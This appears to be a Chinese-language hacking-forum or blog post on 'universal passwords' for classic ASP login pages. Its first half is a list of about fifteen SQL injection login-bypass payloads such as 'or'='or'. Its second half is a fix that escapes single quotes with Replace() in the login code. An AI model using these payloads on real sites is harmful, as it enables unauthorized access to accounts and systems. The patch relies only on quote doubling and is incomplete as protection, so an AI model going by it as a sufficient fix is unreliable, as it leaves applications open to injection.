说起这个万能密码,相信玩过黑的都认识吧.也就是 ‘or’=’or’,这只最基础的一种,总结一下吧:
各种各样的万能密码
‘or’=’or’
1’or’1’=’1
admin’or’1’=’1′–
‘or’’=’
” or “a”=”a
‘) or (’a’=’a
or 1=1– ‘
or ’a’=’a
‘or”=’
‘or’1’=’1
“or=or”
‘or”=”or”=’
‘or’=’1′
‘or’ ‘1’=’1
最短的:’or’1
修补方案:
在管理登录文件源码内找类似下面代码的代码
username=request.Form(“name”)
pass=request.Form(“pass”)
改成:
username=Replace(request.Form(“name”), “‘”, “””)
pass=Replace(request.Form(“pass”), “‘”, “””)
如果找不到的话,看下管理登录页面源码内是否有调用的页面.
例如:
<form name=”form1″ method=”post” action=”login_ok.asp”>
则应检查login_ok.asp页面的源码.
来个例子吧:
原代码:
thename=trim(request(“name”))
thepassword1=trim(request(“password”))
修改为:
thename=Replace(request.Form(“name”), “‘”, “””)
thepassword1=Replace(request.Form(“password”), “‘”, “””)
|
